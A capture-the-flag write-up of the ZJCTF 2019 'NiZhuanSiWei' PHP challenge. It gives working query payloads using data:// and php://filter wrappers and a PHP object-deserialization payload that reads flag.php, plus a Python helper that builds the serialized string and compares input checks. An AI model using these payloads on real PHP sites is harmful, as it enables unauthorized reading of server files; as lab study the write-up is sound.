[ZJCTF 2019]NiZhuanSiWei
Start the target machine and inspect the source code.
https://img2024.cnblogs.com/blog/3518346/202410/3518346-20241013163337431-1594518316.png
Looking up file_get_contents(): the text value passed in here must be a file, and the file's content must be welcome to the zjctf.
https://img2024.cnblogs.com/blog/3518346/202410/3518346-20241013163638832-174284243.png
Here we use the data:// pseudo-protocol to supply that content:
?text=data://text/plain,welcome to the zjctf
Further down there is a regular expression that filters on flag; continue reading.
https://img2024.cnblogs.com/blog/3518346/202410/3518346-20241013164152708-2107528479.png
This is clearly PHP deserialization exploitation, but the definition of the class to exploit is nowhere to be seen. Since the regex blocks flag.php, the only thing we can try is accessing useless.php.
https://img2024.cnblogs.com/blog/3518346/202410/3518346-20241013164233867-1812390730.png
Requesting ?text=data://text/plain,welcome to the zjctf&file=useless.php gives no visible response.
So try reading it through the php://filter pseudo-protocol:
?text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php
https://img2024.cnblogs.com/blog/3518346/202410/3518346-20241013165153729-194354872.png
Base64-decoding the output gives the source of useless.php.
https://img2024.cnblogs.com/blog/3518346/202410/3518346-20241013165220388-192243072.png
At this point the logic is clear: because unserialize() runs after the regex check, we only need to set the file property to flag.php in the deserialized object, then rely on __tostring being invoked automatically when the object is echoed to print the contents of flag.php.
https://img2024.cnblogs.com/blog/3518346/202410/3518346-20241013165647145-1762021604.png
Construct it as follows; only the file property needs a value, which yields O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
https://img2024.cnblogs.com/blog/3518346/202410/3518346-20241013170022368-1769687873.png
Final payload: ?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
Inspecting the page source reveals the flag: flag{17e56d67-d376-4aeb-8de3-a411874f6256}
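To make the serialized format and the ordering problem concrete, here is an added Python example that is not part of the writeup or the challenge: it builds the O:4:"Flag":1:{...} string with PHP's byte-length rules, extracts the class names a blob would instantiate (the allowed_classes check PHP itself offers), and contrasts the /flag/ check applied only to the file parameter, as the writeup describes it, with the same check over every parameter. The function names are my own.

```python
import re

# Added example, not code from the challenge; the function names are mine.

def php_serialize_object(class_name, props):
    """Serialize a PHP object with public string properties into
    O:<len>:"<class>":<count>:{s:<len>:"<key>";s:<len>:"<value>";...}
    Lengths are byte counts over UTF-8; a wrong one makes unserialize()
    return false, the usual reason a hand-written payload seems to do nothing."""
    def s(value):
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)
    body = "".join(s(k) + s(v) for k, v in props.items())
    return 'O:%d:"%s":%d:{%s}' % (len(class_name.encode("utf-8")),
                                  class_name, len(props), body)

_OBJ_HEADER = re.compile(r'O:(\d+):"')

def classes_in(serialized):
    """Class names the blob would instantiate, read by declared byte length
    rather than by scanning for the closing quote."""
    names = []
    for m in _OBJ_HEADER.finditer(serialized):
        n, start = int(m.group(1)), m.end()
        names.append(serialized[start:start + n])
    return names

def only_allowed_classes(serialized, allowed):
    """Mirror of unserialize($data, ['allowed_classes' => [...]]): PHP turns
    any class not on the list into __PHP_Incomplete_Class, so its magic methods
    never run. It does not help when the listed class is itself the gadget, as
    Flag with its file-reading __tostring is here; then the only fix is to stop
    unserializing request input."""
    return all(name in allowed for name in classes_in(serialized))

def flag_in_file_param(params):
    """The challenge's check as the writeup describes it: /flag/ is applied to
    the file parameter only, before unserialize() runs on password."""
    return bool(re.search(r"flag", params.get("file", "")))

def flag_in_any_param(params):
    """The same check over every parameter also catches the flag.php carried
    inside the serialized password value."""
    return any(re.search(r"flag", v) for v in params.values())

if __name__ == "__main__":
    payload = php_serialize_object("Flag", {"file": "flag.php"})
    request = {"text": "data://text/plain,welcome to the zjctf",
               "file": "useless.php", "password": payload}
    print(payload)  # O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
    print(flag_in_file_param(request), flag_in_any_param(request))  # False True
```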
https://img2024.cnblogs.com/blog/3518346/202410/3518346-20241013171020674-1049140763.png